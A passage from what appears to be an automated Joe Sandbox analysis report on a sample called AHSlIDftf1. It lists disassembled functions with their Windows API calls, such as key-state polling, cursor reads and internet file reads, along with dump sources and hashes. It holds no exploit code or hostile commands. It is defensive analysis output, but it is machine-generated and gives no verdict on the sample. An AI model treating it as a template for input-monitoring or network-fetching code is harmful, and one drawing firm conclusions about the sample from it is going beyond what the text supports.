                                                                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 00DE6C4A
                                                                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00DE6C73
                                                                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00DCAB79,00000000,00000000), ref: 00DE6C98
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00DE6CC7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Long$MessageSendShow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3688381893-0
                                                                                                            • Opcode ID: 778cb02d509d489bb6ebe5cb06559716e90613b025e2dc7e9bbc54fb11282769
                                                                                                            • Instruction ID: 8088a6f6abc6c6cef08c15f68f194ad0cc789ca8dd34d83b5656255161022948
                                                                                                            • Opcode Fuzzy Hash: 778cb02d509d489bb6ebe5cb06559716e90613b025e2dc7e9bbc54fb11282769
                                                                                                            • Instruction Fuzzy Hash: 7C41A235604184AFD724EF2ACC95FA97FA5EB19390F280268F895A72A0C371ED41CA60
                                                                                                            Function 00D82051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: 173cc2ff3f99e8109e19a3fdf0e6f853adf3038de8f0969399c47b11aca66cbf
                                                                                                            • Instruction ID: 176aa663490af3ee628567f1bb5e7fb92bf838ae81d4fe53be8a91efd2ec055f
                                                                                                            • Opcode Fuzzy Hash: 173cc2ff3f99e8109e19a3fdf0e6f853adf3038de8f0969399c47b11aca66cbf
                                                                                                            • Instruction Fuzzy Hash: 2141D472A00200AFCB24EF79C885A6DB7F5EF89314F254569E515EB396D731ED01CBA0
                                                                                                            Function 00D6912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCursorPos.USER32(?), ref: 00D69141
                                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00D6915E
                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00D69183
                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00D6919D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4210589936-0
                                                                                                            • Opcode ID: 204d090a8b171a3ec34117c01f6280cb931ccde3ba0e893e576b0b9cc9b38993
                                                                                                            • Instruction ID: b8f400ac3022d02d154b31467f3b36dd0dfc3130ce1419f29e6bacc0f1325dab
                                                                                                            • Opcode Fuzzy Hash: 204d090a8b171a3ec34117c01f6280cb931ccde3ba0e893e576b0b9cc9b38993
                                                                                                            • Instruction Fuzzy Hash: FA415F71A0870AEBDF15AF68C854BFEF7B8FB06320F244215E469A6290C7349955CBB1
                                                                                                            Function 00DC3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetInputState.USER32 ref: 00DC38CB
                                                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00DC3922
                                                                                                            • TranslateMessage.USER32(?), ref: 00DC394B
                                                                                                            • DispatchMessageW.USER32(?), ref: 00DC3955
                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DC3966
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                            • String ID:
                                                                                                            • API String ID: 2256411358-0
                                                                                                            • Opcode ID: 8a542bc5e0604fa871f7fde3ca8c355d1e332907311eb06eb06c4efc9bbd3c17
                                                                                                            • Instruction ID: 90b930276ba547215a3d9f13e35479e669815400bc02cb3730906adb2bde76d8
                                                                                                            • Opcode Fuzzy Hash: 8a542bc5e0604fa871f7fde3ca8c355d1e332907311eb06eb06c4efc9bbd3c17
                                                                                                            • Instruction Fuzzy Hash: C331B9705043839EEB39CB759848FB637A4EB15304F08856DE452D7190EBB5968ACF31
                                                                                                            Function 00DCCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00DCC21E,00000000), ref: 00DCCF38
                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00DCCF6F
                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,00DCC21E,00000000), ref: 00DCCFB4
                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DCC21E,00000000), ref: 00DCCFC8
                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DCC21E,00000000), ref: 00DCCFF2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 3191363074-0
                                                                                                            • Opcode ID: b3d47c1d93c3421a1c66a8e0dfdcc7acbfc4bbbe829932eeea96098ceb5254ef
                                                                                                            • Instruction ID: 6708d017a1eb6977f6fa271887a2b6986c842211bdbd12678f6473279cba754a
                                                                                                            • Opcode Fuzzy Hash: b3d47c1d93c3421a1c66a8e0dfdcc7acbfc4bbbe829932eeea96098ceb5254ef
                                                                                                            • Instruction Fuzzy Hash: 34316D71915706AFDB20DFA5D884EAABBFAEF04310B14542EF65AD7200D730ED419B70
                                                                                                            Function 00DB1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00DB1915
                                                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 00DB19C1
                                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 00DB19C9
                                                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 00DB19DA
                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00DB19E2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3382505437-0
                                                                                                            • Opcode ID: 298a0485328511eb43110ded3f0ac39e8cc7f76df24df2ace38afa82cc3189da
                                                                                                            • Instruction ID: abe6575c3384d3a698ab875c883c12ce7a12ee5a294cafdc65c402cd9fd00880
                                                                                                            • Opcode Fuzzy Hash: 298a0485328511eb43110ded3f0ac39e8cc7f76df24df2ace38afa82cc3189da
                                                                                                            • Instruction Fuzzy Hash: D931AD75A00259EFCF04CFA8C9A9ADE3BB5EB05315F144229F962EB2D1C7709944CFA0
                                                                                                            Function 00DE5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00DE5745
                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00DE579D
                                                                                                            • _wcslen.LIBCMT ref: 00DE57AF
                                                                                                            • _wcslen.LIBCMT ref: 00DE57BA
                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DE5816
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 763830540-0
                                                                                                            • Opcode ID: 19fb0eb1f5e8ac53b489da5f0de7d4cb324d83bf842d2e1c9a6d5dcd3b5fd141
                                                                                                            • Instruction ID: 223dd3fe043d1f0d728ad0c7d7cc1daf230e90aef71e6b9c66bc110cd069e19f
                                                                                                            • Opcode Fuzzy Hash: 19fb0eb1f5e8ac53b489da5f0de7d4cb324d83bf842d2e1c9a6d5dcd3b5fd141
                                                                                                            • Instruction Fuzzy Hash: 1B2193319046989ADB20AF61DC84AEE77B8FF05368F148216E959EA1C5D7708985CF70
                                                                                                            Function 00DD0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsWindow.USER32(00000000), ref: 00DD0951
                                                                                                            • GetForegroundWindow.USER32 ref: 00DD0968
                                                                                                            • GetDC.USER32(00000000), ref: 00DD09A4
                                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00DD09B0
                                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00DD09E8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 4156661090-0
                                                                                                            • Opcode ID: a9aae18a9f600c37adceebc07455c2ce1dc267889bed83506a173c0e27120a1a
                                                                                                            • Instruction ID: bd6fd9579deb4619924153110677b36c66e5e04f8cf4eecd39b8cd75b99a374c
                                                                                                            • Opcode Fuzzy Hash: a9aae18a9f600c37adceebc07455c2ce1dc267889bed83506a173c0e27120a1a
                                                                                                            • Instruction Fuzzy Hash: C8215035600214AFD704EF69C894A5EBBE9EF84701F04846DE856D7362DA30AC05CB70
                                                                                                            Function 00D8CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00D8CDC6
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D8CDE9
                                                                                                              • Part of subcall function 00D83820: RtlAllocateHeap.NTDLL(00000000,?,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6,?,00D51129), ref: 00D83852
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D8CE0F
                                                                                                            • _free.LIBCMT ref: 00D8CE22
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D8CE31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 336800556-0
                                                                                                            • Opcode ID: e56d5ce80fd846c3dab70a61201c5d54c30fc66a520481162a13b7c53ee8a298
                                                                                                            • Instruction ID: c9b555dd217ca46591f2a478c731e1cf600b63b03af5023aea58df64b96fc8ee
                                                                                                            • Opcode Fuzzy Hash: e56d5ce80fd846c3dab70a61201c5d54c30fc66a520481162a13b7c53ee8a298
                                                                                                            • Instruction Fuzzy Hash: A3018472621755BF232236B66C88D7B696DDFC6BA13195129F905C7201EA718D0283B0
                                                                                                            Function 00D69639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D69693
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00D696A2
                                                                                                            • BeginPath.GDI32(?), ref: 00D696B9
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00D696E2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                                            • String ID:
                                                                                                            • API String ID: 3225163088-0
                                                                                                            • Opcode ID: 1b31f2a55444b2d80a70125cbfdc781fd32b805751d774056654e5ffa2692b54
                                                                                                            • Instruction ID: c01486b9caae8be08cf5c38fb854973fd16eabbc808cf8539d5379d9c80ac110
                                                                                                            • Opcode Fuzzy Hash: 1b31f2a55444b2d80a70125cbfdc781fd32b805751d774056654e5ffa2692b54
                                                                                                            • Instruction Fuzzy Hash: 66219570811345EFDB219FA5DC647A97B68BBA1355F140255F410B61B0D3709ADBCFB0
                                                                                                            Function 00DB5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _memcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 2931989736-0
                                                                                                            • Opcode ID: 49c13ec394d5958da45a2b9dd1ea04a8ac0514fb2a6e1885d5dedf7032d5b20d
                                                                                                            • Instruction ID: b303b760af3aa6cbd78458015d091c1f1f6bf7b9dc4131082689be99953314de
                                                                                                            • Opcode Fuzzy Hash: 49c13ec394d5958da45a2b9dd1ea04a8ac0514fb2a6e1885d5dedf7032d5b20d
                                                                                                            • Instruction Fuzzy Hash: A701B575741609FFE2086615AD82FFB735CDB21398F244120FD0A9A245FB60EE1582B0
                                                                                                            Function 00D82DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,?,00D7F2DE,00D83863,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6), ref: 00D82DFD
                                                                                                            • _free.LIBCMT ref: 00D82E32
                                                                                                            • _free.LIBCMT ref: 00D82E59
                                                                                                            • SetLastError.KERNEL32(00000000,00D51129), ref: 00D82E66
                                                                                                            • SetLastError.KERNEL32(00000000,00D51129), ref: 00D82E6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3170660625-0
                                                                                                            • Opcode ID: 8c78f6f1da5596fe95852d424fbc6c57a1bd26f65675b3671d0c3faa9c5a351f
                                                                                                            • Instruction ID: 6793db89a6d5bd3d93dce3bec22865197e56e685c10dba81c02cb07f1f9f6926
                                                                                                            • Opcode Fuzzy Hash: 8c78f6f1da5596fe95852d424fbc6c57a1bd26f65675b3671d0c3faa9c5a351f
                                                                                                            • Instruction Fuzzy Hash: 3101F4323866007BC61337356C8AE3B266DEBC17B1B294028F865E22D2EF24CC014334
                                                                                                            Function 00DB000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?,?,00DB035E), ref: 00DB002B
                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?), ref: 00DB0046
                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?), ref: 00DB0054
                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?), ref: 00DB0064
                                                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?), ref: 00DB0070
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 3897988419-0
                                                                                                            • Opcode ID: 60ff993396d6232798b9978e5e4077f361d6b6a953eac12eb8768324e8556496
                                                                                                            • Instruction ID: 83a22c2e91d948384dee1b12d0d952cd9887e8cb4a8846b02ca17adbed6404eb
                                                                                                            • Opcode Fuzzy Hash: 60ff993396d6232798b9978e5e4077f361d6b6a953eac12eb8768324e8556496
                                                                                                            • Instruction Fuzzy Hash: 83017872610304EBDB116F68DC84BAA7EADEB48792F145124F906DA210EB71DD418BB0
                                                                                                            Function 00DBE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00DBE997
                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 00DBE9A5
                                                                                                            • Sleep.KERNEL32(00000000), ref: 00DBE9AD
                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00DBE9B7
                                                                                                            • Sleep.KERNEL32 ref: 00DBE9F3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                            • String ID:
                                                                                                            • API String ID: 2833360925-0
                                                                                                            • Opcode ID: d0815c595a6b3a6742965871860c1d91a4578dcbcec58376a58927220a99c947
                                                                                                            • Instruction ID: 2d13377f4175f127eda9d2859450cf0d01ebbb7d939c0343278116a30c0f3869
                                                                                                            • Opcode Fuzzy Hash: d0815c595a6b3a6742965871860c1d91a4578dcbcec58376a58927220a99c947
                                                                                                            • Instruction Fuzzy Hash: 1C011331D01629DBCF00ABE9DC99AEDFBB8FB09701F000556E942B7241CB30A6598BB1
                                                                                                            Function 00DB10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DB1114
                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1120
                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB112F
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1136
